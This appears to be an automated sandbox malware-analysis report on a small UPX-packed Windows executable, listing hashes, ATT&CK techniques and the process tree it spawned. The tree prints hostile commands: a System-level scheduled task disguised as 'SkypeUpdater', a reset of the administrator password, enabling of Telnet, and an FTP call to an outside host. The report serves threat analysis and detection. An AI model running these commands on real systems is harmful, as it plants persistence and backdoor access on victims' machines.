e8c667759ebe040b83e68066eac519b6f301aeab0722447eab2491517fe7aecf

General

Target

2376ac65212df30b861dbd6fd6b2f3ea.exe
Size

8KB
MD5

2376ac65212df30b861dbd6fd6b2f3ea
SHA1

e9e2801103127b53a047bd968b01bc03e71c22ec
SHA256

e8c667759ebe040b83e68066eac519b6f301aeab0722447eab2491517fe7aecf
SHA512

28c205825f3cae2ff659b8df9b555dec009a7db66512c24b8a4f0a982944a965952e5e72ac297ecfbdddc74d8f7fc17023ac21e2708a35e9d468525410a2560b
SSDEEP

192:2bTk03SNjWLghqbqnZlc1sBBO1FaNJhLkwcud2DH9VwGfct8uE:2EZjWLorZcpjaNJawcudoD7UWr

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	2376ac65212df30b861dbd6fd6b2f3ea.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2398549320-3657759451-817663969-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 1 IoCs

pid	Process
3300	b2e.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3744-0-0x0000000000400000-0x0000000000409000-memory.dmp	upx
behavioral2/memory/3744-11-0x0000000000400000-0x0000000000409000-memory.dmp	upx

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
996	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2880	schtasks.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3748	taskkill.exe

Runs net.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 3744 wrote to memory of 3300	3744	2376ac65212df30b861dbd6fd6b2f3ea.exe	90
PID 3744 wrote to memory of 3300	3744	2376ac65212df30b861dbd6fd6b2f3ea.exe	90
PID 3744 wrote to memory of 3300	3744	2376ac65212df30b861dbd6fd6b2f3ea.exe	90
PID 3300 wrote to memory of 3516	3300	b2e.exe	91
PID 3300 wrote to memory of 3516	3300	b2e.exe	91
PID 3300 wrote to memory of 3516	3300	b2e.exe	91
PID 3516 wrote to memory of 2880	3516	cmd.exe	94
PID 3516 wrote to memory of 2880	3516	cmd.exe	94
PID 3516 wrote to memory of 2880	3516	cmd.exe	94
PID 3516 wrote to memory of 996	3516	cmd.exe	97
PID 3516 wrote to memory of 996	3516	cmd.exe	97
PID 3516 wrote to memory of 996	3516	cmd.exe	97
PID 3516 wrote to memory of 1012	3516	cmd.exe	95
PID 3516 wrote to memory of 1012	3516	cmd.exe	95
PID 3516 wrote to memory of 1012	3516	cmd.exe	95
PID 1012 wrote to memory of 3284	1012	net.exe	96
PID 1012 wrote to memory of 3284	1012	net.exe	96
PID 1012 wrote to memory of 3284	1012	net.exe	96
PID 3516 wrote to memory of 3748	3516	cmd.exe	98
PID 3516 wrote to memory of 3748	3516	cmd.exe	98
PID 3516 wrote to memory of 3748	3516	cmd.exe	98
PID 3516 wrote to memory of 1592	3516	cmd.exe	100
PID 3516 wrote to memory of 1592	3516	cmd.exe	100
PID 3516 wrote to memory of 1592	3516	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\2376ac65212df30b861dbd6fd6b2f3ea.exe
"C:\Users\Admin\AppData\Local\Temp\2376ac65212df30b861dbd6fd6b2f3ea.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3744
- C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\2376ac65212df30b861dbd6fd6b2f3ea.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\782D.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3516
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks //create //tn SkypeUpdater //tr C:\Windows\\system32\\clientskype.exe //sc onstart //sd 01//11//2009 //ru System
      4⤵
      Creates scheduled task(s)
      PID:2880
  - - C:\Windows\SysWOW64\net.exe
      net user administrator 1
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1012
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user administrator 1
        5⤵
        
        PID:3284
  - - C:\Windows\SysWOW64\sc.exe
      sc config TlntSvr start= auto
      4⤵
      Launches sc.exe
      PID:996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill //im skype.exe
      4⤵
      Kills process with taskkill
      PID:3748
  - - C:\Windows\SysWOW64\ftp.exe
      ftp -n -s:ftp.in store5.data.bg
      4⤵
      PID:1592

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

1

T1053

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7407.tmp\b2e.exe

Filesize
9KB

MD5
f90dba07c27f979c8762a459a0678c4f

SHA1
90199efc05dfe1853ede74744226ca3c4cec0433

SHA256
5a829b002af972c22b875c85e01cac7f64a82867f7bfd47e0990b3a6d455ba92

SHA512
64f30c0df5b54072656e80ea753d2dce06f926987d18d4e1ceefdf31fe84155e93f5019b4e22b3f205e09edb945ddef79669a6e2ff9355e7d665421db3462811

Download Submit
C:\Users\Admin\AppData\Local\Temp\782D.tmp\batchfile.bat

Filesize
833B

MD5
0f187f7ffb3789402b05977f2c897591

SHA1
7d64d5f738aef6cc558cc9a618bfc57b1afe2f34

SHA256
c8825d481f6bc30d3aabead7ec8c8faf2b6066a2c147285af70a7e04b5f3f0f2

SHA512
36d1eb784d9021ca927ef978b37d0b731c4d281d362b07c6fa1a0c13b995e6ec5c403a37176101ccd4588272e5a0effc10d5e924af09819e10c05afbde6e6ea2

Download Submit
C:\Users\Admin\AppData\Roaming\ftp.in

Filesize
79B

MD5
b8fd9388fee0fe8f8da9ded524eec233

SHA1
4572727d40ff0fab00ff6e7b7d9fd1f328ec565e

SHA256
a245542a9ef155971406f29e5e2ed6cf44bac372909f19dd10d7d11589be97d8

SHA512
6e673c0ea259ecdd062acfef4e43ef16ce5326c14c80a27b5a813c43c6be1e0088c019730730f7f7ff7765459dac8396f2b4b40fde4f6b8095bd596df3e0f535

Download Submit
memory/3300-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3300-19-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3744-0-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download
memory/3744-11-0x0000000000400000-0x0000000000409000-memory.dmp

Filesize
36KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads